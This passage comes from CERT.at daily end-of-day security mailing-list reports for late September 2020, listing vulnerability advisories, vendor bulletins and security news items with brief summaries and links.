https://thehackernews.com/2020/10/industrial-remote-access.html
∗∗∗ Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow ∗∗∗
---------------------------------------------
The vulnerability is caused by a boundary error in the processing of received FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited to cause a stack-based buffer overflow when a user issues a POST request to connect to a malicious FTP server. Successful exploitation could allow execution of arbitrary code on the affected device or cause a denial of service scenario.
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
∗∗∗ Vulnerability Spotlight: Remote code execution bugs in NVIDIA D3D10 driver ∗∗∗
---------------------------------------------
Cisco Talos recently discovered multiple remote code execution vulnerabilities in the NVIDIA D3D10 driver. This driver supports multiple GPUs that NVIDIA produces. An adversary could exploit these vulnerabilities by supplying the user with a malformed shader, eventually allowing them to execute code on the victim machine. These bugs could also allow the attacker to perform a guest-to-host escape through Hyper-V [...]
---------------------------------------------
https://blog.talosintelligence.com/2020/09/vuln-spotlight-nvidia-d3d10-.html
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ruby-json-jwt and ruby-rack-cors), Fedora (xen), SUSE (aspell and tar), and Ubuntu (ruby-gon, ruby-kramdown, and ruby-rack).
---------------------------------------------
https://lwn.net/Articles/833191/
∗∗∗ Broken access control in Platinum Mobile ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/broken-access-control-in-plati…
∗∗∗ Red Hat OpenShift: Vulnerability allows bypassing security measures ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0946
∗∗∗ Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (CVE-2020-13935) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat…
∗∗∗ Security Bulletin: IBM Cloud Pak System is affected by a vulnerability in VMware component ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-a…
∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affects IBM Netcool Agile Service Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is affected by multiple Node.js vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: A vulnerability in Netty affects IBM Netcool Agile Service Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-netty-…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information disclosure vulnerability (CVE-2020-4576) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec Affects IBM Sterling Secure Proxy ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 29-09-2020 18:00 − Wednesday 30-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fake software crack sites used to push Exorcist 2.0 Ransomware ∗∗∗
---------------------------------------------
The threat actors behind the Exorcist 2.0 ransomware are using malicious advertising to redirect victims to fake software crack sites that distribute their malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fake-software-crack-sites-us…
∗∗∗ Over 247K Exchange servers unpatched for actively exploited flaw ∗∗∗
---------------------------------------------
More than 247,000 Microsoft Exchange servers are yet to be patched against the CVE-2020-0688 post-auth remote code execution (RCE) vulnerability impacting all Exchange Server versions under support.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-247k-exchange-servers-u…
∗∗∗ Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise ∗∗∗
---------------------------------------------
A new report from Microsoft shows it is clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to identify.
---------------------------------------------
https://www.microsoft.com/security/blog/2020/09/29/microsoft-digital-defens…
∗∗∗ It's 2020, so not only is your mouse config tool a Node.JS Electron app, it's also pwnable by an evil webpage ∗∗∗
---------------------------------------------
Malicious JavaScript can inject commands to execute
Earlier this year, peripheral maker Kensington patched its desktop software to close a vulnerability that could have been exploited by malicious websites to quietly hijack victims' computers.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2020/09/30/kensingtonwo…
∗∗∗ LodaRAT Update: Alive and Well ∗∗∗
---------------------------------------------
By Chris Neal. During our continuous monitoring of LodaRAT, Cisco Talos observed changes in the threat that add new functionality. Multiple new versions of LodaRAT have been spotted being used in the wild. These new versions of LodaRAT abandoned their previous obfuscation techniques. Direct interaction with the threat actor was observed during analysis, indicating the actor is actively monitoring infected hosts.
---------------------------------------------
https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.ht…
∗∗∗ Warning! Supposed voucher codes lead into a subscription trap ∗∗∗
---------------------------------------------
Fake voucher codes for various providers such as Netflix, Steam, Playstation, Google Play or Amazon are currently appearing in increasing numbers. These codes can be found in comments under all kinds of YouTube videos. But instead of the promised 50 euros, victims fall into a subscription trap.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-vermeintliche-gutschein-code…
∗∗∗ This worm phishing campaign is a game-changer in password theft, account takeovers ∗∗∗
---------------------------------------------
The security incident highlights the need for multi-factor authentication in the enterprise.
---------------------------------------------
https://www.zdnet.com/article/this-worm-phishing-campaign-is-a-game-changer…
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch now! Cisco delivers security updates for routers ∗∗∗
---------------------------------------------
Admins should bring professional Cisco routers up to date for security reasons. Attackers are currently exploiting the vulnerabilities.
---------------------------------------------
https://heise.de/-4916417
∗∗∗ FYI: If you're running HP Device Manager, anyone on your network can get admin on your server via backdoor ∗∗∗
---------------------------------------------
Hidden database account discovered, patches finally available as well as mitigations
HP Device Manager, software that allows IT administrators to manage HP Thin Client devices, comes with a backdoor database user account that undermines network security, a UK-based consultant has warned.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2020/09/30/hp_device_ma…
∗∗∗ Huawei Security Advisories ∗∗∗
---------------------------------------------
Huawei has published 16 security advisories for various products.
---------------------------------------------
https://www.huawei.com/en/psirt/all-bulletins
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium, firefox, libvirt, and podman), Debian (firefox-esr and nss), Gentoo (bitcoind, chromium, cifs-utils, gpsd, libuv, and xen), Mageia (firefox, gnutls, mediawiki, samba, and Thunderbird), openSUSE (brotli and cifs-utils), Red Hat (audiofile, bluez, cloud-init, cpio, cups, curl, dbus, dnsmasq, e2fsprogs, evince and poppler, exiv2, expat, firefox, fontforge, freeradius, freerdp, glib2 and ibus, glibc, httpd, hunspell, ipa, kernel, kernel-rt, [...]
---------------------------------------------
https://lwn.net/Articles/833120/
∗∗∗ Vulnerabilities in Bosch PRAESIDEO and PRAESENSA ∗∗∗
---------------------------------------------
BOSCH-SA-538331-BT: Two security vulnerabilities have been uncovered in the web based management interface of the PRAESIDEO Network Controller and the PRAESENSA System Controller. The vulnerabilities will allow a Cross-Site Request Forgery (CSRF) attack and a Cross-site Scripting (XSS) attack. For PRAESIDEO a third vulnerability will allow a replay attack with which authentication can be bypassed. This last vulnerability is present in the web server of the PRAESIDEO Network Controller.
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-538331-bt.html
∗∗∗ Advisory: Multiple Vulnerabilities in SiteManager and GateManager ∗∗∗
---------------------------------------------
https://www.br-automation.com/downloads_br_productcatalogue/assets/16000031…
∗∗∗ Advisory: Multiple Vulnerabilities in GateManager ∗∗∗
---------------------------------------------
https://www.br-automation.com/downloads_br_productcatalogue/assets/16000031…
∗∗∗ Red Hat Enterprise Linux: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0939
∗∗∗ Red Hat Enterprise Linux: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0940
∗∗∗ Red Hat Enterprise Linux/FreeRDP: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0941
∗∗∗ Red Hat Enterprise Linux/WebKitGTK: Multiple vulnerabilities allow execution of arbitrary code with user privileges ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0942
∗∗∗ Security Bulletin: Security vulnerability in WebSphere Liberty Server shipped with IBM Global Mailbox (CVE-2020-4329) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-in…
∗∗∗ Security Bulletin: Version 5.0.5 of Redis included in IBM Netcool Operations Insight 1.6.1.x has a security vulnerability (CVE-2020-14147) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-version-5-0-5-of-redis-in…
∗∗∗ Security Bulletin: Vulnerabilities in WebSphere Application Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-websph…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition may affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in middleware software affect IBM Cloud Pak for Automation ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4629) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: Version 4.17.15 of Node.js module lodash included in IBM Netcool Operations Insight 1.6.1.x has a security vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-version-4-17-15-of-node-j…
∗∗∗ Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Commons Codec vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact…
∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Operations Analytics Predictive Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c…
∗∗∗ Security Bulletin: IBM Cloud Manager with OpenStack is affected by a OpenSSL vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-manager-with-op…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 28-09-2020 18:00 − Tuesday 29-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 ∗∗∗
---------------------------------------------
The Netlogon Remote Protocol (also called MS-NRPC) is an RPC interface that is used exclusively by domain-joined devices. MS-NRPC includes an authentication method and a method of establishing a Netlogon secure channel. These updates enforce the specified Netlogon client behavior to use secure RPC with Netlogon secure channel between member computers and Active Directory (AD) domain controllers (DC). This security update addresses the vulnerability by enforcing secure RPC when using the [...]
---------------------------------------------
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-…
∗∗∗ Windows 10 is offering a confusing mess of Intel driver updates ∗∗∗
---------------------------------------------
Windows 10 2004 is offering optional updates for Intel drivers that are a confusing mess for users who attempt to install them.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-10-is-offering-a-co…
∗∗∗ Backdoor Obfuscation: tempnam & URL Encoding ∗∗∗
---------------------------------------------
In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code. During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host. This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i: [...]
---------------------------------------------
https://blog.sucuri.net/2020/09/backdoor-obfuscation-tempnam-url-encoding.h…
∗∗∗ [SANS ISC] Managing Remote Access for Partners & Contractors ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: "Managing Remote Access for Partners & Contractors": Yesterday, I wrote a quick diary about a potential security issue that some Tyler customers faced. Some people reacted to my diary with interesting comments in our forums. Two of them were interesting and deserve some [...]
---------------------------------------------
https://blog.rootshell.be/2020/09/29/sans-isc-managing-remote-access-for-pa…
∗∗∗ Cloud-y, with a chance of hacking all the wireless things ∗∗∗
---------------------------------------------
Grandstream are a provider of IP video and voice services, as well as Wi-Fi and other related services and equipment. Their products are sold in over 150 countries and they [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/cloudy-with-a-chance-of-hacki…
∗∗∗ Do not pre-order the Playstation 5 at biogaming.de ∗∗∗
---------------------------------------------
Many people are eagerly awaiting the new Playstation 5. To be sure of getting a unit when sales start in November, consumers are looking for online shops that still accept pre-orders. Caution is advised, however: fake shops are also offering the Playstation 5! Anyone who orders from biogaming.de, for example, receives no goods despite paying.
---------------------------------------------
https://www.watchlist-internet.at/news/playstation-5-nicht-bei-biogamingde-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Information Disclosure on WP Courses plugin exposes private course videos and materials ∗∗∗
---------------------------------------------
Today we've got an interesting story to share. A vulnerability in WP Courses caused our Java course to be publicly disclosed via the WordPress REST API. Let’s dive into the details and see what happened.
---------------------------------------------
https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plug…
∗∗∗ Security updates available for the Windows versions of Foxit Reader and PhantomPDF ∗∗∗
---------------------------------------------
The Foxit team has fixed security vulnerabilities, mostly rated high risk, in Reader and PhantomPDF for Windows as well as in the 3D Plugin (Beta).
---------------------------------------------
https://heise.de/-4915016
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr and mediawiki), openSUSE (firefox, libqt5-qtbase, and rubygem-actionpack-5_1), Red Hat (qemu-kvm, qemu-kvm-ma, and virt:rhel), SUSE (dpdk, firefox, and go1.15), and Ubuntu (dpdk, imagemagick, italc, libpgf, libuv1, pam-python, squid3, ssvnc, and teeworlds).
---------------------------------------------
https://lwn.net/Articles/832958/
∗∗∗ Trend Micro Security products: Vulnerability allows bypassing security measures ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0938
∗∗∗ Security Bulletin: IBM Security Verify Privilege Vault Remote is vulnerable to local user security bypass (CVE-2020-4607) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-verify-privi…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to (CVE-2020-8244) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to an infinite read loop (CVE-2020-16845) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM i ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to Kubernetes vulnerabilities (CVE-2020-8557, CVE-2020-8559) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to a regular expression infinite loop (NODE-SECURITY-1488) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2590 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java…
∗∗∗ Security Bulletin: Aspera on Cloud CVE-2020-8184 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-aspera-on-cloud-cve-2020-…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVE-2020-8553) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2601 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 25-09-2020 18:00 − Monday 28-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Some Tyler Technologies Customers Targeted with The Installation of a Bomgar Client, (Mon, Sep 28th) ∗∗∗
---------------------------------------------
One of our readers, a Tyler Technologies customer, reported to us that he found this morning the Bomgar client[1] (BeyondTrust) installed on one of his servers. There is an ongoing discussion on Reddit with the same kind of reports[2].
---------------------------------------------
https://isc.sans.edu/diary/rss/26610
∗∗∗ Magento Credit Card Stealing Malware: gstaticapi ∗∗∗
---------------------------------------------
Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information. To obtain sensitive details, the malware loads external javascript whenever the URL contains “checkout” — this location typically belongs to the step in Magento’s checkout process where users enter their sensitive credit card information and shipping details.
---------------------------------------------
https://blog.sucuri.net/2020/09/magento-credit-card-stealing-malware-gstati…
∗∗∗ Free decryption tool for the ThunderX ransomware is available ∗∗∗
---------------------------------------------
Security researchers have discovered a flaw in the encryption used by the ThunderX ransomware and are now offering help.
---------------------------------------------
https://heise.de/-4913470
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch now! AgeLocker ransomware is targeting Qnap NAS devices ∗∗∗
---------------------------------------------
Owners of network-attached storage (NAS) devices from Qnap should update their device for security reasons.
---------------------------------------------
https://heise.de/-4913513
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (curl, libdbi-perl, linux-4.19, lua5.3, mediawiki, nfdump, openssl1.0, qt4-x11, qtbase-opensource-src, ruby-gon, and yaws), Fedora (f2fs-tools, grub2, libxml2, perl-DBI, singularity, xawtv, and xen), Mageia (cifs-utils, kio-extras, libproxy, mbedtls, nodejs, novnc, and pdns), openSUSE (bcm43xx-firmware, chromium, conmon, fuse-overlayfs, libcontainers-common, podman, firefox, libqt4, libqt5-qtbase, openldap2, ovmf, pdns, rubygem-actionpack-5_1, and [...]
---------------------------------------------
https://lwn.net/Articles/832831/
∗∗∗ MediaWiki: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A local attacker can exploit multiple vulnerabilities in MediaWiki to execute arbitrary code with user privileges, carry out a cross-site scripting attack, manipulate data, or carry out further attacks with unspecified impact.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0923
∗∗∗ MediaWiki: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in MediaWiki to carry out a cross-site scripting attack or bypass security measures.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0934
∗∗∗ Trend Micro Apex One: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A local attacker can exploit multiple vulnerabilities in Trend Micro Apex One to escalate privileges, execute code, and disclose information.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0925
∗∗∗ F5 BIG-IP: Vulnerability allows denial of service ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit a vulnerability in F5 BIG-IP to carry out a denial of service attack.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0927
∗∗∗ Security Advisory - Buffer Overflow Vulnerability BootHole in GRUB2 Secure Boot ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-…
∗∗∗ Security Bulletin: Insecure Use of InnerHTML or OuterHTML in IBM Enterprise Records ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-insecure-use-of-innerhtml…
∗∗∗ Security Bulletin: Dynamically constructed href attribute in IBM Enterprise Records ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-dynamically-constructed-h…
∗∗∗ Security Bulletin: Apache Commons Codec Vulnerability Affects IBM Control Center ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-commons-codec-vuln…
∗∗∗ Security Bulletin: Multiple Java Vulnerabilities Impact IBM Control Center ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-java-vulnerabili…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Node.js lodash vulnerability (CVEID: 183560) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Private – OpenSSL (CVE-2019-1563, CVE-2019-1549, CVE-2019-1547) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Event Streams is affected by Node.js http-proxy and lodash module vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: IBM Event Streams is affected by a vulnerability in the Go runtime (CVE-2020-16845) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: IBM Event Streams is affected by a Redis vulnerability (CVE-2020-14147) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to an Elasticsearch vulnerability (CVE-2019-7614) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from OpenSSH affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Netty vulnerability (CVE-2020-11612) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: A Security Vulnerability affects IBM Cloud Private – Logstash (CVE-2019-7620) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR + CVE-2020-15664) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR + CVE-2020-15659) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to Kibana vulnerabilities (CVE-2020-7015, CVE-2020-7013, CVE-2020-7012) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVEID: 182747) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Private – Node.js (CVE-2019-15605, CVE-2019-15606) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 24-09-2020 18:00 − Friday 25-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Data leak: Airbnb gives hosts access to other users' inboxes ∗∗∗
---------------------------------------------
Hosts report that they are being shown the messages of other Airbnb hosts, right down to the PIN that opens the door.
---------------------------------------------
https://www.golem.de/news/datenleck-airbnb-gibt-gastgebern-zugriff-auf-frem…
∗∗∗ Sodinokibi Ransomware 101: Origin, Victims, Prevention Strategies ∗∗∗
---------------------------------------------
Cyberattacks have become a part of our reality, but have you ever wondered what might happen if your company gets targeted? You probably imagine that you would lose some money and a great deal of time, maybe fire an employee or two, lose a few clients and have your reputation tainted or eventually even deal [...]
---------------------------------------------
https://heimdalsecurity.com/blog/sodinokibi-ransomware-101/
∗∗∗ Ghost in action: the Specter botnet ∗∗∗
---------------------------------------------
On August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file (22523419f0404d628d02876e69458fbe.css) with 0 VT detection. When we took a close look, we saw a new botnet that targets AVTECH IP Camera / NVR / DVR devices, and it has flexible configuration, highly modular / plugin, and uses TLS, [...]
---------------------------------------------
https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/
∗∗∗ Securing Exchange Online [Guest Diary], (Fri, Sep 25th) ∗∗∗
---------------------------------------------
[...] The base configuration of Exchange Online is set to allow quick onboarding of customers with minimal barriers to the smooth migration of email into the service. The configuration does require tweaks in order to make it more secure. I aim to cover some of the more effective tweaks in this document and point the reader to the right documentation to secure their Exchange tenant.
---------------------------------------------
https://isc.sans.edu/diary/rss/26600
∗∗∗ Fortinet VPN with Default Settings Leave 200,000 Businesses Open to Hackers ∗∗∗
---------------------------------------------
As the pandemic continues to accelerate the shift towards working from home, a slew of digital threats have capitalized on the health concern to exploit weaknesses in the remote work infrastructure and carry out malicious attacks. Now according to network security platform provider SAM Seamless Network, over 200,000 businesses that have deployed the Fortigate VPN solution to enable employees to [...]
---------------------------------------------
https://thehackernews.com/2020/09/fortigate-vpn-security.html
∗∗∗ Study: Attackers are targeting the home office, millions of times via RDP connections ∗∗∗
---------------------------------------------
During the coronavirus pandemic, researchers have registered a significant increase in attacks on remote connections. With the right tips you can protect yourself.
---------------------------------------------
https://heise.de/-4912452
∗∗∗ Security update bundle for Cisco's network operating systems IOS and IOS XE ∗∗∗
---------------------------------------------
Admins take note: before heading into the weekend, updates for IOS and IOS XE are waiting that close a total of 34 vulnerabilities rated as high risk.
---------------------------------------------
https://heise.de/-4912352
∗∗∗ Handling Incidents in ICS – Getting to the Root of the Problem ∗∗∗
---------------------------------------------
For most organizations, having an incident response plan is a regulatory or even legal requirement these days. Unfortunately just having [...]
---------------------------------------------
https://www.dragos.com/blog/industry-news/handling-incidents-in-ics-getting…
=====================
= Vulnerabilities =
=====================
∗∗∗ macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave ∗∗∗
---------------------------------------------
This document describes the security content of macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave.
---------------------------------------------
https://support.apple.com/kb/HT211849
∗∗∗ iCloud for Windows 11.4 ∗∗∗
---------------------------------------------
This document describes the security content of iCloud for Windows 11.4.
---------------------------------------------
https://support.apple.com/kb/HT211846
∗∗∗ iCloud for Windows 7.21 ∗∗∗
---------------------------------------------
This document describes the security content of iCloud for Windows 7.21.
---------------------------------------------
https://support.apple.com/kb/HT211847
∗∗∗ Cisco Security Advisories ∗∗∗
---------------------------------------------
Cisco has published 42 security advisories with the following "Security Impact Ratings":
High: 29
Medium: 13
---------------------------------------------
https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (rails), openSUSE (chromium, jasper, ovmf, roundcubemail, samba, and singularity), Oracle (firefox), SUSE (bcm43xx-firmware, firefox, libqt5-qtbase, qemu, and tiff), and Ubuntu (aptdaemon, atftp, awl, packagekit, and spip).
---------------------------------------------
https://lwn.net/Articles/832509/
∗∗∗ Security Bulletin: IBM InfoSphere Information Server is vulnerable to Cross-frame scripting ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-informatio…
∗∗∗ Security Bulletin: Security Vulnerabilities in IBM® Java SDK July 2020 CPU plus CVE-2020-2590 and CVE-2020-2601 affect multiple IBM Continuous Engineering products based on IBM Jazz Technology ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4643) ∗∗∗
---------------------------------------------
